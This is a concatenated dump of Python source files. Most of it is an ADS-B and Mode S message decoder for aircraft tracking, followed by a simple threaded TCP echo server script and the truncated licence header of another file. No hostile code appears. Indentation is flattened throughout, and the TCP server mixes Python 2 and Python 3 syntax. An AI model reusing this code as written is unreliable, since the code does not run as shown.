msg, self.lat0, self.lon0
)
speed, track, _, speed_type, *_ = pms.adsb.surface_velocity(msg)
if speed_type != "GS":
logging.warn(f"Ground airspeed for aircraft {self.icao24}")
with self.lock:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
latitude=self.lat,
longitude=self.lon,
groundspeed=speed,
track=track,
onground=True,
)
)
@property
def altcode(self) -> None:
pass
@altcode.setter
def altcode(self, args: tuple[datetime, str]) -> None:
t, msg = args
from pyModeS import hex2bin
if set(hex2bin(msg)[19:32]) in [{"0"}, {"1"}]:
return
self.alt = pms.common.altcode(msg)
with self.lock:
self.cumul.append(
dict(timestamp=t, icao24=self.icao24, altitude=self.alt)
)
@property
def idcode(self) -> None:
pass
@idcode.setter
def idcode(self, args: tuple[datetime, str]) -> None:
t, msg = args
from pyModeS import hex2bin
if set(hex2bin(msg)[19:32]) in [{"0"}, {"1"}]:
return
idcode = pms.common.idcode(msg)
with self.lock:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
squawk=idcode,
)
)
@property
def bds20(self) -> None:
pass
@bds20.setter
def bds20(self, args: tuple[datetime, str]) -> None:
t, msg = args
callsign = pms.commb.cs20(msg).strip("_")
if callsign == "":
return
self._callsign = callsign
with self.lock:
# in case altitude was already included from altcode (DF 4 or 20)
# or squawk from idcode (DF5 or 21)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = dict( # type: ignore
**last_entry, callsign=self._callsign
)
else:
self.cumul.append(
dict(
timestamp=t, icao24=self.icao24, callsign=self._callsign
)
)
@property
def bds40(self) -> None:
pass
@bds40.setter
def bds40(self, args: tuple[datetime, str]) -> None:
t, msg = args
with self.lock:
# in case altitude was already included from altcode (DF 4 or 20)
# or squawk from idcode (DF5 or 21)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = { # type: ignore
**last_entry,
**dict(
# FMS selected altitude (ft)
selected_fms=pms.commb.selalt40fms(msg),
# MCP/FCU selected altitude (ft)
selected_mcp=pms.commb.selalt40mcp(msg),
# Barometric pressure (mb)
barometric_setting=pms.commb.p40baro(msg),
),
}
else:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
# FMS selected altitude (ft)
selected_fms=pms.commb.selalt40fms(msg),
# MCP/FCU selected altitude (ft)
selected_mcp=pms.commb.selalt40mcp(msg),
# Barometric pressure (mb)
barometric_setting=pms.commb.p40baro(msg),
)
)
@property
def bds44(self) -> None:
pass
@bds44.setter
def bds44(self, args: tuple[datetime, str]) -> None:
t, msg = args
wind = pms.commb.wind44(msg)
wind = wind if wind is not None else (None, None)
with self.lock:
# in case altitude was already included from altcode (DF 4 or 20)
# or squawk from idcode (DF 5 or 21)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = { # type: ignore
**last_entry,
**dict(
# Humidity (%)
humidity=pms.commb.hum44(msg),
# Average static pressure (hPa)
pressure=pms.commb.p44(msg),
# Static air temperature (C)
temperature=pms.commb.temp44(msg),
turbulence=pms.commb.turb44(msg),
# Wind speed (kt) and direction (true) (deg)
windspeed=wind[0],
winddirection=wind[1],
),
}
else:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
# Humidity (%)
humidity=pms.commb.hum44(msg),
# Average static pressure (hPa)
pressure=pms.commb.p44(msg),
# Static air temperature (C)
temperature=pms.commb.temp44(msg),
turbulence=pms.commb.turb44(msg),
# Wind speed (kt) and direction (true) (deg)
windspeed=wind[0],
winddirection=wind[1],
)
)
@property
def bds45(self) -> None:
pass
@bds45.setter
def bds45(self, args: tuple[datetime, str]) -> None:
t, msg = args
with self.lock:
# in case altitude was already included from altcode (DF 4 or 20)
# or squawk from idcode (DF 5 or 21)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = { # type: ignore
**last_entry,
**dict(
# Turbulence level (0-3)
turbulence=pms.commb.turb45(msg),
# Wind shear level (0-3)
wind_shear=pms.commb.ws45(msg),
# Microburst level (0-3)
microburst=pms.commb.mb45(msg),
# Icing level (0-3)
icing=pms.commb.ic45(msg),
# Wake vortex level (0-3)
wake_vortex=pms.commb.wv45(msg),
# Static air temperature (C)
temperature=pms.commb.temp45(msg),
# Average static pressure (hPa)
pressure=pms.commb.p45(msg),
# Radio height (ft)
radio_height=pms.commb.rh45(msg),
),
}
else:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
# Turbulence level (0-3)
turbulence=pms.commb.turb45(msg),
# Wind shear level (0-3)
wind_shear=pms.commb.ws45(msg),
# Microburst level (0-3)
microburst=pms.commb.mb45(msg),
# Icing level (0-3)
icing=pms.commb.ic45(msg),
# Wake vortex level (0-3)
wake_vortex=pms.commb.wv45(msg),
# Static air temperature (C)
temperature=pms.commb.temp45(msg),
# Average static pressure (hPa)
pressure=pms.commb.p45(msg),
# Radio height (ft)
radio_height=pms.commb.rh45(msg),
)
)
@property
def bds50(self) -> None:
pass
@bds50.setter
def bds50(self, args: tuple[datetime, str]) -> None:
t, msg = args
with self.lock:
# in case altitude was already included from altcode (DF 4 or 20)
# or squawk from idcode (DF5 or 21)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = { # type: ignore
**last_entry,
**dict(
# Ground speed (kt)
groundspeed=pms.commb.gs50(msg),
# Roll angle (deg)
roll=pms.commb.roll50(msg),
# True airspeed (kt)
TAS=pms.commb.tas50(msg),
# True track angle (deg)
track=pms.commb.trk50(msg),
# Track angle rate (deg/sec)
track_rate=pms.commb.rtrk50(msg),
),
}
else:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
# Ground speed (kt)
groundspeed=pms.commb.gs50(msg),
# Roll angle (deg)
roll=pms.commb.roll50(msg),
# True airspeed (kt)
TAS=pms.commb.tas50(msg),
# True track angle (deg)
track=pms.commb.trk50(msg),
# Track angle rate (deg/sec)
track_rate=pms.commb.rtrk50(msg),
)
)
@property
def bds60(self) -> None:
pass
@bds60.setter
def bds60(self, args: tuple[datetime, str]) -> None:
t, msg = args
with self.lock:
# in case altitude was already included from altcode (DF 4 or 20)
# or squawk from idcode (DF5 or 21)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = { # type: ignore
**last_entry,
**dict(
# Indicated airspeed (kt)
IAS=pms.commb.ias60(msg),
# Magnetic heading (deg)
heading=pms.commb.hdg60(msg),
# Mach number (-)
Mach=pms.commb.mach60(msg),
# Barometric altitude rate (ft/min)
vertical_rate_barometric=pms.commb.vr60baro(msg),
# Inertial vertical speed (ft/min)
vertical_rate_inertial=pms.commb.vr60ins(msg),
),
}
else:
self.cumul.append(
dict(
timestamp=t,
icao24=self.icao24,
# Indicated airspeed (kt)
IAS=pms.commb.ias60(msg),
# Magnetic heading (deg)
heading=pms.commb.hdg60(msg),
# Mach number (-)
Mach=pms.commb.mach60(msg),
# Barometric altitude rate (ft/min)
vertical_rate_barometric=pms.commb.vr60baro(msg),
# Inertial vertical speed (ft/min)
vertical_rate_inertial=pms.commb.vr60ins(msg),
)
)
@property
def nuc_p(self) -> None:
pass
@nuc_p.setter
def nuc_p(self, args: tuple[datetime, str]) -> None:
t, msg = args
with self.lock:
hpl, rcu, rcv = pms.adsb.nuc_p(msg)
current = dict(
# Horizontal Protection Limit
HPL=hpl,
# 95% Containment Radius on horizontal position error
RCu=rcu,
# 95% Containment Radius on vertical position error
RCv=rcv,
)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = {**last_entry, **current} # type: ignore
else:
self.cumul.append(
dict( # type: ignore
timestamp=t, icao24=self.icao24, **current
)
)
@property
def nic_v1(self) -> None:
pass
@nic_v1.setter
def nic_v1(self, args: tuple[datetime, str]) -> None:
t, msg = args
if self.nic_s is None:
return
with self.lock:
hcr, vpl = pms.adsb.nic_v1(msg, self.nic_s)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
current = dict(
# Horizontal Containment Radius
HCR=hcr,
# Vertical Protection Limit
VPL=vpl,
)
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = {**last_entry, **current} # type: ignore
else:
self.cumul.append(
dict( # type: ignore
timestamp=t, icao24=self.icao24, **current
)
)
@property
def nic_v2(self) -> None:
pass
@nic_v2.setter
def nic_v2(self, args: tuple[datetime, str]) -> None:
t, msg = args
if self.nic_a is None or self.nic_bc is None:
return
with self.lock:
hcr = pms.adsb.nic_v2(msg, self.nic_a, self.nic_bc)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
current = dict(
# Horizontal Containment Radius
HCR=hcr
)
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = {**last_entry, **current} # type: ignore
else:
self.cumul.append(
dict( # type: ignore
timestamp=t, icao24=self.icao24, **current
)
)
@property
def nuc_r(self) -> None:
pass
@nuc_r.setter
def nuc_r(self, args: tuple[datetime, str]) -> None:
t, msg = args
with self.lock:
hve, vve = pms.adsb.nuc_v(msg)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
current = dict(
# Horizontal Velocity Error
HVE=hve,
# Vertical Velocity Error
VVE=vve,
)
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = {**last_entry, **current} # type: ignore
else:
self.cumul.append(
dict( # type: ignore
timestamp=t, icao24=self.icao24, **current
)
)
@property
def nac_v(self) -> None:
pass
@nac_v.setter
def nac_v(self, args: tuple[datetime, str]) -> None:
t, msg = args
with self.lock:
hfm, vfm = pms.adsb.nac_v(msg)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
current = dict(
# Horizontal Figure of Merit for rate (GNSS)
HFM=hfm,
# Vertical Figure of Merit for rate (GNSS)
VFM=vfm,
)
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = {**last_entry, **current} # type: ignore
else:
self.cumul.append(
dict( # type: ignore
timestamp=t, icao24=self.icao24, **current
)
)
@property
def nac_p(self) -> None:
pass
@nac_p.setter
def nac_p(self, args: tuple[datetime, str]) -> None:
t, msg = args
with self.lock:
epu, vepu = pms.adsb.nac_p(msg)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
current = dict(
# Estimated Position Uncertainty
EPU=epu,
# Vertical Estimated Position Uncertainty
VEPU=vepu,
)
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = {**last_entry, **current} # type: ignore
else:
self.cumul.append(
dict( # type: ignore
timestamp=t, icao24=self.icao24, **current
)
)
@property
def sil(self) -> None:
pass
@sil.setter
def sil(self, args: tuple[datetime, str]) -> None:
t, msg = args
with self.lock:
phcr, pvpl, base = pms.adsb.sil(msg, self.version)
last_entry = self.cumul[-1] if len(self.cumul) > 0 else None
current = dict(
version=self.version,
# Probability exceeding Horizontal Containment Radius
pHCR=phcr,
# Probability exceeding Vertical Protection Limit
pVPL=pvpl,
sil_base=base,
)
if last_entry is not None and last_entry["timestamp"] == t:
self.cumul[-1] = {**last_entry, **current} # type: ignore
else:
self.cumul.append(
dict( # type: ignore
timestamp=t, icao24=self.icao24, **current
)
)
class AircraftDict(Dict[str, Aircraft]):
lat0: float
lon0: float
decoder: ModeS_Decoder
def __missing__(self, key: str) -> Aircraft:
self.decoder.on_new_aircraft(key)
self[key] = value = Aircraft(key, self.lat0, self.lon0)
return value
def set_latlon(self, lat0: float, lon0: float) -> None:
self.lat0 = lat0
self.lon0 = lon0
for ac in self.values():
ac.lat0 = lat0
ac.lon0 = lon0
class DumpFormat:
def __init__(self, template: str, sep: str = ",") -> None:
self.template = template
self.sep = sep
self.cols = list(x.strip() for x in template.split(sep))
time_gen = (i for i, elt in enumerate(self.cols) if elt == "time")
self.time_index = next(time_gen, None)
if self.time_index is None:
msg = "Format invalid: must contain 'time'"
raise ValueError(msg)
long_gen = (i for i, elt in enumerate(self.cols) if elt == "longmsg")
self.msg_index = next(long_gen, None)
self.splitmsg = slice(18, None)
if self.msg_index is not None:
return
short_gen = (i for i, elt in enumerate(self.cols) if elt == "shortmsg")
self.msg_index = next(short_gen, None)
if self.msg_index is None:
msg = "Format invalid: must contain either 'longmsg' or 'shortmsg'"
raise ValueError(msg)
self.splitmsg = slice(None)
def get_timestamp(self, line: str) -> datetime:
elts = line.split(self.sep)
return datetime.fromtimestamp(
float(elts[self.time_index].strip()), timezone.utc # type: ignore
)
def get_msg(self, line: str) -> str:
elts = line.split(self.sep)
return elts[self.msg_index][self.splitmsg].strip() # type: ignore
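# Hypothetical usage sketch: with a "time, shortmsg" template the whole hex
# field is kept, whereas the default "time, longmsg" template drops the first
# 18 hex characters (the receiver timestamp prefix) before decoding.
def _demo_dump_format() -> None:
    fmt = DumpFormat("time, shortmsg")
    line = "1656766800.0, 8d4840d6202cc371c32ce0576098"
    assert fmt.get_msg(line) == "8d4840d6202cc371c32ce0576098"
    assert fmt.get_timestamp(line).year == 2022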
class ModeS_Decoder:
"""
This class implements the full data decoding process with the `pyModeS
library <https://mode-s.org/api/>`_
Data is first available as a list of messages per aircraft, but can be
exported as a :class:`~traffic.core.Traffic` object.
.. warning::
The :meth:`from_address`, :meth:`from_dump1090`, and :meth:`from_rtlsdr`
classmethods start a decoding thread on the creation of the object. The
thread can be stopped with a ``decoder.thread.stop()`` call.
:param reference: A reference location must be provided to decode ground
messages. A reference can be set as:
- a tuple of latitude/longitude coordinates
- a str calling for an :class:`~traffic.core.structure.Airport`
structure
    If no reference is provided (None), the location (latitude=0,
    longitude=0) is used as a fallback until enough data is available to
    readjust the reference.
"""
decode_thread: Optional[StoppableThread]
timer_thread: Optional[StoppableThread]
timer_functions: list[
tuple[pd.Timestamp, pd.Timedelta, Callable[[Decoder], None]]
] = list()
def __init__(
self,
reference: None | str | Airport | tuple[float, float] = None,
expire_threshold: str | pd.Timedelta = pd.Timedelta("10 minutes"),
expire_frequency: str | pd.Timedelta = pd.Timedelta("1 minute"),
) -> None:
""" """
if isinstance(reference, str):
from ...data import airports
reference = airports[reference]
if reference is None:
logging.warning(
"No valid reference position provided. Fallback to (0, 0)"
)
lat0, lon0 = 0.0, 0.0
elif isinstance(reference, Airport):
lat0, lon0 = reference.latlon
else:
lat0, lon0 = reference
self.acs: AircraftDict = AircraftDict()
self.acs.decoder = self
self.acs.set_latlon(lat0, lon0)
self.decode_thread = None
self.timer_thread = None
self.expire_threshold = (
expire_threshold
if isinstance(expire_threshold, pd.Timedelta)
else pd.Timedelta(expire_threshold)
)
self.expire_frequency = (
expire_frequency
if isinstance(expire_frequency, pd.Timedelta)
else pd.Timedelta(expire_frequency)
)
@classmethod
def on_timer(
cls, frequency: pd.Timedelta | str
) -> Callable[[Callable[[Decoder], None]], Callable[[Decoder], None]]:
now = pd.Timestamp("now", tz="utc")
if isinstance(frequency, str):
frequency = pd.Timedelta(frequency)
def decorate(
function: Callable[[Decoder], None]
) -> Callable[[Decoder], None]:
logging.info(f"Schedule {function.__name__} with {frequency}")
heapq.heappush(
cls.timer_functions,
(now + frequency, frequency, function),
)
return function
return decorate
def expire_aircraft(self) -> None:
logging.info("Running expire_aircraft")
now = pd.Timestamp("now", tz="utc")
if self.decode_thread and not self.decode_thread.is_alive():
for icao in list(self.acs):
self.on_expire_aircraft(icao)
# for icao, ac in self.acs.items()
# not compatible with changes in size of the dictionary
for icao in list(self.acs):
ac = self.acs[icao]
if len(ac.cumul) > 0:
if now - ac.cumul[-1]["timestamp"] >= self.expire_threshold:
self.on_expire_aircraft(icao)
else:
flight = ac.flight
if flight is not None:
if now - flight.stop >= self.expire_threshold:
self.on_expire_aircraft(icao)
def on_expire_aircraft(self, icao: str) -> None:
with self.acs[icao].lock:
del self.acs[icao]
def on_new_aircraft(self, icao: str) -> None:
logging.info(f"New aircraft {icao}")
@classmethod
def from_file(
cls,
filename: str | Path,
reference: str | Airport | tuple[float, float],
uncertainty: bool = False,
template: str = "time, longmsg",
sep: str = ",",
) -> "ModeS_Decoder":
"""Decode raw messages dumped in a text file.
        Each line of the file should contain at least a timestamp and a
        hexadecimal message, in a CSV-like format.
:param filename: the path to the file containing the data
:param reference: the reference location, as specified above
:param uncertainty: if True, decode also `uncertainty information
<https://mode-s.org/decode/content/ads-b/7-uncertainty.html>`_
:param template: the header explaining how data is organised
Three parameters are accepted:
- ``time`` represents the timestamp in seconds (float)
- ``shortmsg`` represents the regular version of the ADS-B
hexadecimal message (messages of length 28 for ADS-B)
- ``longmsg`` represents messages containing timestamp information
          as a prefix, as dumped by many decoding tools, such as
`dump1090 <https://github.com/MalcolmRobb/dump1090/>`_ or other
receivers.
By default, the expected format is ``time, longmsg``
"""
if isinstance(filename, str):
filename = Path(filename)
dumpformat = DumpFormat(template, sep)
with filename.open("r") as fh:
all_lines = fh.readlines()
decoder = cls(reference)
decoder.process_msgs(
list(
(
dumpformat.get_timestamp(line),
dumpformat.get_msg(line),
)
for line in all_lines
),
uncertainty=uncertainty,
)
return decoder
@classmethod
def from_binary(
cls,
filename: Union[str, Path],
reference: Union[str, Airport, tuple[float, float]],
*,
uncertainty: bool = False,
time_fmt: str = "dump1090",
time_0: Optional[datetime] = None,
redefine_mag: int = 10,
fh: Optional[TextIO] = None,
) -> "ModeS_Decoder":
decoder = cls(reference)
redefine_freq = 2**redefine_mag - 1
decode_time_here = decode_time.get(time_fmt, decode_time_default)
def next_in_binary(filename: Union[str, Path]) -> Iterator[bytes]:
with Path(filename).open("rb") as fh:
while True:
get = fh.read()
if len(get) == 0:
return
yield get
# We don't know the size of the binary so tqdm.rich does not work
from tqdm.autonotebook import tqdm
for i, bin_msg in tqdm(enumerate(next_msg(next_in_binary(filename)))):
if len(bin_msg) < 23:
continue
msg = "".join(["{:02x}".format(t) for t in bin_msg])
now = decode_time_here(msg, time_0)
if fh is not None:
fh.write("{},{}\n".format(now.timestamp(), msg))
if i & redefine_freq == redefine_freq:
decoder.redefine_reference(now)
decoder.process(now, msg[18:], uncertainty=uncertainty)
return decoder
@classmethod
def from_rtlsdr(
cls,
reference: Union[str, Airport, tuple[float, float]],
file_pattern: str = "~/ADSB_EHS_RAW_%Y%m%d_rtlsdr.csv",
uncertainty: bool = False,
) -> "ModeS_Decoder": # coverage: ignore
"""Decode raw messages dumped from a RTL-SDR receiver.
:param reference: the reference location, as specified above
:param file_pattern: the filename where to dump received hexadecimal
messages
Timestamp format specifiers are accepted.
| Default value: ``"~/ADSB_EHS_RAW_%Y%m%d_rtlsdr.csv"``
| (The ``~`` character gets expanded as your home directory)
:param uncertainty: if True, decode also `uncertainty information
<https://mode-s.org/decode/content/ads-b/7-uncertainty.html>`_
.. warning::
This method requires the `pyrtlsdr
<https://github.com/roger-/pyrtlsdr>`_ optional dependency.
"""
from .rtlsdr import MyRtlReader
decoder = cls(reference)
# dump file
now = datetime.now(timezone.utc)
filename = now.strftime(file_pattern)
today = os.path.expanduser(filename)
fh = open(today, "a", 1)
rtlsdr = MyRtlReader(decoder, fh, uncertainty=uncertainty)
decoder.decode_thread = StoppableThread(target=rtlsdr.run)
decoder.decode_thread.start()
return decoder
@classmethod
def from_socket(
cls,
socket: socket.socket,
reference: Union[str, Airport, tuple[float, float]],
*,
uncertainty: bool,
time_fmt: str = "default",
time_0: Optional[datetime] = None,
redefine_mag: int = 7,
fh: Optional[TextIO] = None,
) -> "ModeS_Decoder": # coverage: ignore
decoder = cls(reference)
redefine_freq = 2**redefine_mag - 1
decode_time_here = decode_time.get(time_fmt, decode_time_default)
def next_in_socket() -> Iterator[bytes]:
while True:
if (
decoder.decode_thread is None
or decoder.decode_thread.to_be_stopped()
):
socket.close()
return
yield socket.recv(2048)
def decode() -> None:
for i, bin_msg in enumerate(next_msg(next_in_socket())):
msg = "".join(["{:02x}".format(t) for t in bin_msg])
# Timestamp decoding
now = decode_time_here(msg, time_0)
if fh is not None:
fh.write("{},{}\n".format(now.timestamp(), msg))
if len(bin_msg) < 23:
continue
if (
time_fmt != "radarcape"
and i & redefine_freq == redefine_freq
):
decoder.redefine_reference(now)
decoder.process(now, msg[18:], uncertainty=uncertainty)
def timer() -> None:
assert decoder.decode_thread is not None
# This one is automatically added
cls.on_timer(decoder.expire_frequency)(cls.expire_aircraft)
# if the decoder is not alive, finish expiring aircraft
while decoder.decode_thread.is_alive() or len(decoder.acs) != 0:
now = pd.Timestamp("now", tz="utc")
t, delta, operation = heapq.heappop(cls.timer_functions)
if now < t:
wait = t - now
time.sleep(wait.total_seconds())
now = pd.Timestamp("now", tz="utc")
operation(decoder)
logging.info(f"Schedule {operation.__name__} at {now + delta}")
heapq.heappush(
cls.timer_functions, (now + delta, delta, operation)
)
decoder.decode_thread = StoppableThread(target=decode)
decoder.decode_thread.start()
decoder.timer_thread = StoppableThread(target=timer)
decoder.timer_thread.start()
return decoder
def stop(self) -> None:
if self.decode_thread is not None and self.decode_thread.is_alive():
self.decode_thread.stop()
self.decode_thread.join()
def __del__(self) -> None:
self.stop()
@classmethod
def from_dump1090(
cls,
reference: Union[str, Airport, tuple[float, float]],
file_pattern: str = "~/ADSB_EHS_RAW_%Y%m%d_dump1090.csv",
uncertainty: bool = False,
) -> "ModeS_Decoder": # coverage: ignore
"""Decode raw messages dumped from `dump1090
<https://github.com/MalcolmRobb/dump1090/>`_
:param reference: the reference location, as specified above
:param file_pattern: the filename where to dump received hexadecimal
messages
Timestamp format specifiers are accepted.
| Default value: ``"~/ADSB_EHS_RAW_%Y%m%d_dump1090.csv"``
| (The ``~`` character gets expanded as your home directory)
:param uncertainty: if True, decode also `uncertainty information
<https://mode-s.org/decode/content/ads-b/7-uncertainty.html>`_
.. warning::
        dump1090 must be run with the ``--net`` option.
"""
now = datetime.now(timezone.utc)
filename = now.strftime(file_pattern)
today = os.path.expanduser(filename)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("localhost", 30005))
fh = open(today, "a", 1)
return cls.from_socket(
s,
reference,
uncertainty=uncertainty,
time_fmt="dump1090",
time_0=now,
fh=fh,
)
@classmethod
def from_address(
cls,
host: str,
port: int,
reference: Union[str, Airport, tuple[float, float]],
file_pattern: str = "~/ADSB_EHS_RAW_%Y%m%d_tcp.csv",
time_fmt: str = "radarcape",
uncertainty: bool = False,
) -> "ModeS_Decoder": # coverage: ignore
"""Decode raw messages transmitted over a TCP network.
        Received messages are also dumped to a text file, with one timestamp
        and one hexadecimal message per line, in a CSV-like format.
:param host: the IP address of the host to connect
:param port: the port of the host to connect
:param reference: the reference location, as specified above
:param file_pattern: the filename where to dump received hexadecimal
messages
Timestamp format specifiers are accepted.
| Default value: ``"~/ADSB_EHS_RAW_%Y%m%d_tcp.csv"``
| (The ``~`` character gets expanded as your home directory)
:param time_fmt: (default: ``"radarcape"``)
- if set to ``"radarcape"``, timestamp information included in the
long message is assumed to be GPS adjusted and is therefore used
to adjust the timestamp of each message;
- if set to ``"dump1090"``, clock information provided by the
software is used to adjust the timestamp of each message, but the
first timestamp is based on the computer clock;
- if set to ``"default"``, the timestamp from the computer is used
for all decoded messages
:param uncertainty: if True, decode also `uncertainty information
<https://mode-s.org/decode/content/ads-b/7-uncertainty.html>`_
"""
now = datetime.now(timezone.utc)
filename = now.strftime(file_pattern)
today = os.path.expanduser(filename)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
fh = open(today, "a", 1)
return cls.from_socket(
s, reference, uncertainty=uncertainty, time_fmt=time_fmt, fh=fh
)
def redefine_reference(self, time: datetime) -> None:
pos = list(
(ac.lat, ac.lon)
for ac in self.acs.values()
if ac.alt is not None
and ac.alt < 5000
and ac.tpos is not None
and (time - ac.tpos).total_seconds() < 20 * 60
)
n = len(pos)
if n > 0:
sum_lat = cast(float, sum(a[0] for a in pos))
sum_lon = cast(float, sum(a[1] for a in pos))
self.acs.set_latlon(sum_lat / n, sum_lon / n)
def process_msgs(
self, msgs: Iterable[tuple[datetime, str]], uncertainty: bool = False
) -> None:
for i, (t, msg) in tqdm(enumerate(msgs), total=sum(1 for _ in msgs)):
if i & 127 == 127:
self.redefine_reference(t)
self.process(t, msg, uncertainty=uncertainty)
def process(
self,
time: datetime,
msg: str,
*args: Any,
uncertainty: bool = False,
spd: Optional[float] = None,
trk: Optional[float] = None,
alt: Optional[float] = None,
) -> None:
ac: Aircraft
if len(msg) != 28:
return
df = pms.df(msg)
if df == 4 or df == 20:
icao = pms.icao(msg)
if isinstance(icao, bytes):
icao = icao.decode()
ac = self.acs[icao.lower()]
ac.altcode = time, msg # type: ignore
if df == 5 or df == 21:
icao = pms.icao(msg)
if isinstance(icao, bytes):
icao = icao.decode()
ac = self.acs[icao.lower()]
ac.idcode = time, msg # type: ignore
if df == 17 or df == 18: # ADS-B
if pms.crc(msg, encode=False) != 0:
return
tc = pms.adsb.typecode(msg)
icao = pms.icao(msg)
# before it's fixed in pyModeS release...
if isinstance(icao, bytes):
icao = icao.decode()
ac = self.acs[icao.lower()]
if 1 <= tc <= 4:
ac.callsign = time, msg # type: ignore
if 5 <= tc <= 8:
ac.surface = time, msg # type: ignore
if tc == 19:
ac.speed = time, msg # type: ignore
if 9 <= tc <= 18:
# This is barometric altitude
ac.position = time, msg # type: ignore
if 20 <= tc <= 22:
# Only GNSS altitude
pass
if not uncertainty:
return
if 9 <= tc <= 18:
ac.nic_bc = pms.adsb.nic_b(msg)
if (5 <= tc <= 8) or (9 <= tc <= 18) or (20 <= tc <= 22):
ac.nuc_p = time, msg # type: ignore
if ac.version == 1:
ac.nic_v1 = time, msg # type: ignore
elif ac.version == 2:
ac.nic_v2 = time, msg # type: ignore
if tc == 19:
ac.nuc_r = time, msg # type: ignore
if ac.version in [1, 2]:
ac.nac_v = time, msg # type: ignore
if tc == 29:
ac.sil = time, msg # type: ignore
ac.nac_p = time, msg # type: ignore
if tc == 31:
ac.version = pms.adsb.version(msg)
ac.sil = time, msg # type: ignore
ac.nac_p = time, msg # type: ignore
if ac.version == 1:
ac.nic_s = pms.adsb.nic_s(msg)
elif ac.version == 2:
ac.nic_a, ac.nic_bc = pms.adsb.nic_a_c(msg)
elif df == 20 or df == 21:
bds = pms.bds.infer(msg)
icao = pms.icao(msg)
if isinstance(icao, bytes):
icao = icao.decode()
ac = self.acs[icao.lower()]
if bds == "BDS20":
ac.bds20 = time, msg # type: ignore
return
if bds == "BDS40":
ac.bds40 = time, msg # type: ignore
return
if bds == "BDS44":
ac.bds44 = time, msg # type: ignore
return
if bds == "BDS45":
ac.bds45 = time, msg # type: ignore
return
if bds == "BDS50,BDS60":
if spd is not None and trk is not None and alt is not None:
bds = pms.bds.is50or60(msg, spd, trk, alt)
elif (
ac.spd is not None
and ac.trk is not None
and ac.alt is not None
):
bds = pms.bds.is50or60(msg, ac.spd, ac.trk, ac.alt)
else:
return
# do not return!
if bds == "BDS50":
ac.bds50 = time, msg # type: ignore
return
if bds == "BDS60":
ac.bds60 = time, msg # type: ignore
return
@property
def aircraft(self) -> list[Dict[str, Any]]:
return sorted(
(
dict(
icao24=key,
callsign=ac.callsign,
length=(
(len(ac.cumul) + len(ac._flight))
if ac._flight is not None
else len(ac.cumul)
),
position=ac.lat is not None,
data=ac,
)
# avoid dictionary change size during iteration
for (key, ac) in list(self.acs.items())
if ac.callsign is not None
),
key=itemgetter("length"),
reverse=True,
)
@property
def traffic(self) -> None | Traffic:
"""
:return: All decoded data is converted into a
:class:`~traffic.core.Traffic` object.
"""
try:
return Traffic.from_flights(
self[elt["icao24"]] for elt in self.aircraft
)
except ValueError as e:
logging.warning(e)
return None
def __getitem__(self, icao: str) -> Optional[Flight]:
with self.acs[icao].lock:
ac = self.acs[icao]
return ac.flight
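# Hypothetical usage sketch (the file path and reference airport are
# assumptions, not part of the module): decode a recorded dump and export
# everything as a Traffic object.
def _demo_decode_from_file() -> None | Traffic:
    decoder = ModeS_Decoder.from_file(
        "adsb_dump.csv",  # placeholder path to a "time, longmsg" dump
        reference="LFBO",  # resolved through traffic.data.airports
        template="time, longmsg",
    )
    return decoder.traffic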
|
tcp_server.py
|
#!/usr/bin/env python
__author__ = "bt3"
import socket
import threading
# Defining constants
# The IP address and port we want the server to listen on
BIND_IP = '0.0.0.0'
BIND_PORT = 9090
# Start a thread to handle client connection
def handle_client(client_socket):
    # Get data from client (bytes in Python 3)
    request = client_socket.recv(1024)
    print("[*] Received: " + request.decode(errors='replace'))
    # Send back an acknowledgement packet
    client_socket.send(b'ACK')
    client_socket.close()
def tcp_server():
# Create a socket object (just like the client)
server = socket.socket( socket.AF_INET, socket.SOCK_STREAM)
# Start listening
server.bind(( BIND_IP, BIND_PORT))
# the maximum backlog of connections is set to 5
server.listen(5)
print"[*] Listening on %s:%d" % (BIND_IP, BIND_PORT)
# putting the server in the loop to wait for incoming connections
while 1:
# when a client connects, we receive the client socket (client variable)
# the connections variables go to the addr variable
client, addr = server.accept()
print "[*] Accepted connection from: %s:%d" %(addr[0], addr[1])
# create a thread object that points to our function
client_handler = threading.Thread(target=handle_client, args=(client,))
client_handler.start()
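# Hypothetical companion client (not part of the original script): connect to
# the server above, send one request and print the acknowledgement.
def tcp_client(message=b'hello'):
    client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    client.connect(('127.0.0.1', BIND_PORT))
    client.send(message)
    response = client.recv(4096)
    print("[*] Server replied: %s" % response.decode())
    client.close()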
if __name__ == '__main__':
tcp_server()
|
scheduler.py
|
#!/usr/bin/env python
#################################################################################
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"). #
